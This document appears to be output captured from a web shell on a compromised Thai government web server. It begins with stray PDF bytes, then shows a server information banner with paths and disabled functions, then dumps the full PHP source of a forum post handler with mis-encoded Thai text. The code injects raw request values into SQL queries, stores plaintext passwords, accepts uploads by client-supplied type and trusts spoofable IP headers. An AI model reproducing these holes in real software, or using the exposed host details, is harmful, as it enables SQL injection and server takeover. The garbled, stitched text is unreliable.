%PDF-1.5 % ºaâÚÎΞ-ÌE1�ØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY
| Server IP : 122.155.177.87 / Your IP : 122.155.177.87 Web Server : Apache/2 System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64 User : phunphin ( 1164) PHP Version : 5.3.29 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/phunphin/domains/phunphin.go.th/public_html/webboard/ |
Upload File : |
<?php
require_once("check_thai_ip.php");
if (!$___in_range) {
header('HTTP/1.1 403 Forbidden');
echo "<h1>403 Forbidden</h1><p>äÁè͹ØÒµãËéà¢éÒ¶Ö§¨Ò¡ IP ¢Í§¤Ø³: " . $_SERVER['REMOTE_ADDR'] . "</p>";
exit();
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title></title>
<link href="../styles.css" rel="stylesheet" type="text/css" />
<!--body -->
<style type="text/css">
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-color:#ffffff;
font-family: 'Kanit', sans-serif;
}
a:link {
text-decoration: none;
}
a:visited {
text-decoration: none;
}
a:hover {
text-decoration: none;
}
a:active {
text-decoration: none;
}
</style>
<!--body -->
<!--font-->
<link href="https://fonts.googleapis.com/css?family=Chakra+Petch|Kanit|Pridi&display=swap" rel="stylesheet">
</head>
<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td> </td>
</tr>
<tr>
<td><div align="center">
<?
include("config.inc.php");
include("function.php");
// àªç¤ËÁÇ´¢Í§àÇ纺ÍÃì´
mysql_connect($host,$user_db,$passwd_db);
mysql_query ("SET NAMES 'tis620'");
$c_sql = "select * from webboard_category where cat_name='$Category' ";
$c_result = mysql_db_query($dbname,$c_sql);
$c_NRow = mysql_num_rows($c_result);
$c_row = mysql_fetch_array($c_result);
$nlist = $c_row["cat_title"];
if($c_NRow==0) {
echo "<center><br>";
echo "<font color=red size=+1> ¡ÃسÒÃÐºØ Category ãËéµÃ§¡Ñº·Õè web à»Ô´ãªé´éǤÃѺ</font>";
echo "<br>";
echo "</center>";
exit();
}
// ¨º¡ÒÃàªç¤
if ($_SERVER['HTTP_CLIENT_IP']) {
$IP = $_SERVER['HTTP_CLIENT_IP'];
} elseif (ereg("[0-9]",$_SERVER["HTTP_X_FORWARDED_FOR"] )) {
$IP = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else {
$IP = $_SERVER["REMOTE_ADDR"];
}
$Member = 0;
// »éͧ¡Ñ¹¡ÒÃá·Ã¡ html ¡Ñº ÅÐà¤Ã×èͧËÁÒ ' "
$QTitle = htmlspecialchars($QTitle);
$QNote = htmlspecialchars($QNote);
$QName = htmlspecialchars($QName);
$QEmail = htmlspecialchars($QEmail);
// ===== à¾ÔèÁ¿Ñ§¡ìªÑ¹¡Ãͧ¤ÓµéͧËéÒÁ =====
function hasBadWords($text) {
$badWords = array('¾¹Ñ¹', 'àÇçºâ»ê', 'à«ç¡Êì', 'ºÒ¤ÒÃèÒ', 'ËÇÂ', '¤ÒÊÔâ¹', 'á·§ºÍÅ','á·§ÁÇÂ', 'á·§', 'asd', 'â»ê', '18+', 'xxx', 'àÊÕè§⪤', 'àÇ纾¹Ñ¹', '¡Òþ¹Ñ¹', 'àÇçºá·§ÁÇÂ', 'one', 'ÂÍ´¹ÔÂÁ', 'àÇçºá·§ÁÇÂÍ͹äŹì ', '·Õè´Õ·ÕèÊØ´', 'àÇçºÁÇÂä·Â', 'àª×èͶ×Íä´é', '100%', 'àÇçºá·§µÐ¡ÃéÍÍ͹äŹì', 'á·§µÐ¡ÃéÍÊ´ä´é·Ø¡Çѹ', 'àÇçºá·§µÐ¡ÃéÍÍ͹äŹì', '¾¹Ñ¹¡ÕÌÒÍ͹äŹì', 'Íѹ´Ñº1', 'TOP1', 'ä´éà§Ô¹¨ÃÔ§', 'ÊÁѤçèÒÂ', 'ÅÔ¢ÊÔ·¸Ôìá·é ', 'àÇçºÂÍ´¹ÔÂÁ', 'àÇçºÁÇÂ', '¨èÒ¨ÃÔ§', 'ÁÑ蹤§»ÅÍ´ÀÑÂ', 'á·§ÇÑÇ', 'á·§ä¡è', 'Åͧà»Ô´ã¨ÁÒàÅè¹ÊÑ¡¤ÃÑé§', 'ÂØÊãËÁèà¢éÒ§èÒÂá¹è¹Í¹', 'TOP10', 'àÇçºÊÅç͵ÃÒÂãËè¢Í§ä·Â', 'Ãкº¶Í¹à§Ô¹ÍÍâµé', 'äÁèÁÕ¢Õ´¨Ó¡Ñ´', 'ÃèÇÁʹء¡Ñºà¡ÁÊÅç͵·Õèᵡ§èÒÂ', 'àª×èÍÁÑè¹ä´éàÅÂÇèÒàÁ×èÍàÅ蹡ѺàÃÒ', 'UFAX198 ', 'ÃèÇÁʹء¡Ñºà¡ÁÊÅç͵·Õèᵡ§èÒÂ', 'äÁèÇèҤس¨ÐàÅ×Í¡àÅè¹¼èÒ¹¤èÒÂä˹', '¤Ø³¨Ðä´éÃѺ¼ÅµÍºá·¹ÊÙ§', 'ON.9', 'àÅè¹ËÇÂÅÒÇ', 'ËÇÂÎÒ¹ÍÂ', 'ÊÁѤÃàÇçºËÇÂ', 'á·§ËÇÂ24', 'ÍѵÃÒ¨èÒÂ', '¡ÕÌҿصºÍÅ·Õè¹èÒÃѺªÁ', 'á¹Ð¹Ó@BY789', '¡ÒôٺÍÅÊ´', 'ÀÒ¾¤ÁªÑ´', 'áÅйÓàʹÍä´éÍÂèÒ§´ÕäÁÕÁÕÊдش', '@]BY789', 'ä¡èª¹Í͹äŹì', 'ä¡èª¹ä·Â', 'ÁÇÂä·Â@BY789', 'ÁÇÂä·Â@BY789ÈÔŻлéͧ¡Ñ¹', '¡ÕÌÒ·ÕèÃÇÁÃèÒ§¡ÒÂáÅШԵã¨', 'àÇçºllnvºÍÅ', 'àÇçºä˹´Õ', 'àÇçºllnvºÍÅÍ͹äŹì', 'llnvºÍÅ', 'ÈÔŻлéͧ¡Ñ¹', '¢Íá¹Ð¹Ó');
foreach ($badWords as $word) {
if (stripos($text, $word) !== false) {
return true;
}
}
return false;
}
// àªç¤ËÁÇ´¢Í§àÇ纺ÍÃì´
mysql_connect($host,$user_db,$passwd_db);
mysql_query ("SET NAMES 'tis620'");
$c_sql = "select * from webboard_category where cat_name='$Category' ";
$c_result = mysql_db_query($dbname,$c_sql);
$c_NRow = mysql_num_rows($c_result);
$c_row = mysql_fetch_array($c_result);
$nlist = $c_row["cat_title"];
if($c_NRow==0) {
echo "<center><br>";
echo "<font color=red size=+1> ¡ÃسÒÃÐºØ Category ãËéµÃ§¡Ñº·Õè web à»Ô´ãªé´éǤÃѺ</font>";
echo "<br>";
echo "</center>";
exit();
}
// ¨º¡ÒÃàªç¤
if ($_SERVER['HTTP_CLIENT_IP']) {
$IP = $_SERVER['HTTP_CLIENT_IP'];
} elseif (ereg("[0-9]",$_SERVER["HTTP_X_FORWARDED_FOR"] )) {
$IP = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else {
$IP = $_SERVER["REMOTE_ADDR"];
}
$Member = 0;
// »éͧ¡Ñ¹¡ÒÃá·Ã¡ html ¡Ñº ÅÐà¤Ã×èͧËÁÒ ' "
$QTitle = htmlspecialchars($QTitle);
$QNote = htmlspecialchars($QNote);
$QName = htmlspecialchars($QName);
$QEmail = htmlspecialchars($QEmail);
// ===== µÃǨÊͺ¤ÓµéͧËéÒÁ ¡è͹´Óà¹Ô¹¡ÒõèÍ =====
if (hasBadWords($QTitle) || hasBadWords($QNote)) {
echo "<center><br><font color=red size=+1> ¢éͤÇÒÁÁÕ¤ÓµéͧËéÒÁ àªè¹ ¡Òþ¹Ñ¹ ËÃ×ͤÓäÁèàËÁÒÐÊÁ ¡ÃسÒá¡é䢡è͹â¾Êµì</font><br>";
echo "<a href='javascript:history.back(1)' class='styles2'>[ ¡ÅѺä»á¡éä¢ ]</a></center>";
exit();
}
// »éͧ¡Ñ¹¤ÓËÂÒº
$QTitle = CheckRude($QTitle);
$QNote = CheckRude($QNote);
$QName = CheckRude($QName);
$QEmail = CheckRude($QEmail);
// µÃǨÊͺ¡ÒÃá·Ã¡ÃÙ»ÀÒ¾
$txt = array(":b1:", ":b2:",":b3:", ":b4:", ":b5:", ":b6:", ":b7:", ":b8:", ":b9:", ":b10:", ":b11:");
$pic = array("b1.gif","b2.gif","b3.gif","b4.gif","b5.gif","b6.gif","b7.gif","b8.gif","b9.gif","b10.gif","b11.gif");
for ($a=0 ; $a<sizeof($txt) ; $a++) {
$QNote = eregi_replace($txt[$a],"<img src=\"pic/$pic[$a]\">",$QNote);
}
// µÃǨÊͺÇèÒ ÁÕ¡Òûé͹ url ËÃ×Í email ÁÒËÃ×ÍäÁè ¶éÒÁÕãËé·Ó link
//ÊÓËÃѺà»ÅÕè¹ÍÑ¡¢ÃзÕè¡Ó˹´ ãËéà»ç¹á·¡ html µèÒ§æ
$QNote = eregi_replace ( "\[b\]", "<b> " , $QNote ) ;
$QNote = eregi_replace ( "\[/b\]", " </b>" , $QNote ) ;
$QNote = eregi_replace ( "\[i\]", "<i> " , $QNote ) ;
$QNote = eregi_replace ( "\[/i\]", " </i>" , $QNote ) ;
$QNote = eregi_replace ( "\[u\]", "<u> " , $QNote ) ;
$QNote = eregi_replace ( "\[sup\]", "<sup> " , $QNote ) ;
$QNote = eregi_replace ( "\[/sup\]", " </sup>" , $QNote ) ;
$QNote = eregi_replace ( "\[sub\]", "<sub> " , $QNote ) ;
$QNote = eregi_replace ( "\[/sub\]", " </sub>" , $QNote ) ;
$QNote = eregi_replace ( "\[/u\]", " </u>" , $QNote ) ;
$QNote = eregi_replace ( "\[\-\-\-\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[color=red\]", "<font color=red > " , $QNote ) ;
$QNote = eregi_replace ( "\[color=green\]", "<font color=green> " , $QNote ) ;
$QNote = eregi_replace ( "\[color=blue\]", "<font color=blue> " , $QNote ) ;
$QNote = eregi_replace ( "\[color=orange\]", "<font color=FF6600> " , $QNote ) ;
$QNote = eregi_replace ( "\[color=pink\]", "<font color=FF00FF> " , $QNote) ;
$QNote = eregi_replace ( "\[color=gray\]", "<font color=999999> " , $QNote ) ;
$QNote = eregi_replace ( "\[/color\]", " </font>" , $QNote ) ;
$QNote = eregi_replace ( "\[glow\]"," <table style=filter:glow(color=pink, strength=3)> ", $QNote ) ;
$QNote = eregi_replace ( "\[/glow\]", " </table>" , $QNote ) ;
$QNote = eregi_replace ( "\[shadow\]","<table style=\"filter:shadow(color=pink, direction=left)\"> ", $QNote ) ;
$QNote = eregi_replace ( "\[/shadow\]", " </table>" , $QNote ) ;
// ãËé¢Ö鹺ѹ·Ñ´ãËÁè ¡Ã³Õ·ÕèÁÕ¡ÒÃà¤ÒÐ Enter
$QNote = eregi_replace(chr(13)," <br> ", $QNote );
$QNote = eregi_replace("(^|[>[:space:]\n])([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])([<[:space:]\n]|$)","<a href=\"\\2://\\3\\4\" target=\"_blank\">\\2://\\3\\4</a>", $QNote );
$QNote = eregi_replace("([[:alnum:]]+)@([^[:space:]]*)([[:alnum:]])([<[:space:]\n]|$)","<a href=mailto:\\1@\\2\\3\>\\1@\\2\\3</a>", $QNote );
//µÃǨÊͺ¡ÒÃâ¾Ê¡ÃзÙé (ËéÒÁâ¾Êà¡Ô¹ ¨Ó¹Ç¹·ÕèÃкØã¹ config)
CheckFlood($IP);
// µÃǨÊͺÇèÒà»ç¹ÊÁÒªÔ¡ËÃ×ÍäÁè
$sql = "select User,Password,Email from webboard_member where User='$QName'";
$result = mysql_db_query($dbname,$sql);
$NRow = mysql_num_rows($result);
$row = mysql_fetch_array($result);
$Member = $row["User"];
// µÃǨÊͺÇèÒ Password ¶Ù¡ËÃ×ÍäÁè
if($QName==$row["User"] && $QPass==$row["Password"])
{
$Member = 1;
if(!$QEmail)
{
$QEmail = $row["Email"];
}
}else
{
$Member = 0;
}
if(strcmp($_POST['code_input'],$_POST['code_hidden'])==0){
// ·Ó¡Òà à¾ÔèÁ¤èÒ¡ÒÃâ¾Ê¢Í§ÊÁÒªÔ¡
if($Member) {
$sql3 = "update webboard_member set m_post=m_post+1 where User='$QName'";
$result3 = mysql_db_query($dbname,$sql3);
}
else { };
// ¨º¡Ò÷ӧҹ
// ºÑ¹·Ö¡ÃÙ»ÀÒ¾
if(($QNote =='')&&($QName==''))
{
echo "<center >";
echo "<font size=+1 color=\"red\">";
echo "¢éͤÇÒÁÊè§ÁÒäÁèÊÁºÙóìÍÒ¨ãÊè¢éÍÁÙÅäÁè¤Ãº ËÃ×͵¡ËÅè¹ÃÐËÇèÒ§¡ÒÃÊè§¢éÍÁÙÅ ¡ÃسÒÊè§¢éͤÇÒÁÍÕ¡¤ÃÑé§<br><br>";
echo "<font size=+1 color=red >";
echo "<a href='javascript:history.back(1)'>[ ¡ÅѺä»á¡éä¢ ] </a>";
echo "</font>";
echo "</center>";
exit();
}
if( $QPic !='')
{
srand((double)microtime()*1000000);
$QPic_name=$random_pic = rand(1,9999);
# µÃǨÊͺ¤ÇÒÁ¡ÇéÒ§¢Í§ÃÙ»
$size = getimagesize($QPic);
# µÃǨÊͺ¢¹Ò´¢Í§ Flash
if ( $QPic_type == "application/x-shockwave-flash" ) {
if($QPic_size>$flashSize_limit) {
echo "<br><b><center><font size=3 color=red >¢¹Ò´¢Í§ä¿Åì Flash à¡Ô¹ $flashSize_limit bytes [$flashSize_msg]</font></center></b><br>";
echo "<br><b><center><font size=3 color=red >[ <a href='javascript:history.back(1)'>¡ÅѺä»á¡éä¢</a> ]</font></center></b>";
exit();
}
}
else {
# µÃǨÊͺ¢¹Ò´¢Í§ÃÙ»
if($QPic_size>$Image_size) {
echo "<br><b><center><font size=3 color=red >¢¹Ò´¢Í§ÀÒ¾à¡Ô¹ $Image_size bytes [$Image_msg]</font></center></b><br>";
echo "<br><b><center><font size=3 color=red >[ <a href='javascript:history.back(1)'>¡ÅѺä»á¡éä¢</a> ]</font></center></b>";
exit();
}
}
#á»Å§¹ÒÁÊ¡ØÅ áÅзӡÒà upload
if ( $QPic_type == "image/gif" )
{
$filename = $QPic_name.".gif";
}
if ( $QPic_type == "image/bmp" )
{
$filename = $QPic_name.".bmp";
}
if ( $QPic_type == "image/png" )
{
$filename = $QPic_name.".png";
}
if ( $QPic_type == "application/x-shockwave-flash" )
{
$filename = $QPic_name.".swf";
}
elseif (($QPic_type=="image/jpg")||($QPic_type=="image/jpeg")||($QPic_type=="image/pjpeg"))
{
$filename =strtolower($QPic_name.$random_pic . '.jpg');
}
copy ($QPic , "$path/" . $filename );
}
elseif ($QPic == "")
{
echo "";
}
// àÇÅҨеç¡Ñºà¤Ã×èͧ server ·ÕèàÃÒÃѹ
$mdate = date("Y-m-d H:i:s");
// µÃǨÊͺÇèÒà»ç¹ÊÁÒªÔ¡ËÃ×ÍäÁè ·ÕèÊÒÁÒöâ¾Ê»ÃСÒÈä´é
$sql2 = "select User from webboard_member where User='$QName' and Password='$QPass' and status='1' ";
$result2 = mysql_db_query($dbname,$sql2);
$row2 = mysql_fetch_array($result2);
$Member2 = $row2["User"];
// àªç¤ username ÇèÒãËéÊÒÁÒöâ¾Ê¢èÒÇ»ÃСÒÈä´éäËÁ
if($Member2 && $pst==1) {
$mp = 1;
}
else {
$mp = 0;
}
//ʤÃÔ»´Ñ¡¡ÃзÙé¢ÂСè͹ŧ°Ò¹¢éÍÁÙÅ
/* if(ereg("www",$_POST[QNote]) || ereg("http",$_POST[QNote]) || ereg("<a href",$_POST[QNote]) || ereg("<",$_POST[QNote])){
echo "\n";
echo "<center>";
echo "<BR><BR><a href='javascript:history.back(1)' class='styles2'> ¡Ãس¡ÃÍ¡¢éÍÁÙÅãËé¶Ù¡µéͧ</a><BR><BR><BR><BR>";
exit;
}*/
// à¢Õ¹¢éÍÁÙÅŧ database
$sql = "insert into webboard_data (Category,Question,Note,Name,Namer,Member,IP,Email,Date,nphoto,resolution,pst) values ('$Category','$QTitle','$QNote','$QName','$MsgBy','$Member','$IP','$QEmail','$mdate','$filename','$size[0]','$mp')";
$result1 = mysql_db_query($dbname,$sql);
mysql_close();
?>
</div></td>
</tr>
<tr>
<td><div align="center">
<table width=60% border=0 bgcolor=#000000 cellpadding=7 cellspacing=1>
<tr>
<td align=center bgcolor=#ffffff class="styles3"><span class="red">ä´éÃѺ¢éÍÁÙÅáÅéǤÃѺ</span><br>
<br>
ËÒ¡¡ÅѺä»Ë¹éÒáááÅéǤӶÒÁ¢Í§¤Ø³ÂѧäÁè¢Öé¹ãËéÅͧ¡´»ØèÁ Refresh/Reload ¤ÃѺ </font></td>
</tr>
</table>
</div></td>
</tr>
<tr>
<td> </td>
</tr>
<tr>
<td class="styles3"><div align="center">| <a href="webboard.php?Category=<? echo $Category; ?>" class="styles2">áÊ´§¤Ó¶ÒÁ</a> || <a href="postq.php?Category=<? echo $Category; ?>" class="styles2">µÑé§¡ÃзÙéãËÁè </a>|</div></td>
</tr>
<?
}
else{
echo "<br><b><center><span class=red>¡ÃسÒãÊè¤èÒ Verification code</span></center></b><br>";
echo "<br><b><center><span class=styles1 >[ <a href='javascript:history.back(1)' class=styles2>¡ÅѺä»á¡éä¢</a> ]</span></center></b>";
}
?>
<tr>
<td> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td> </td>
</tr>
</table>
</body>
</html>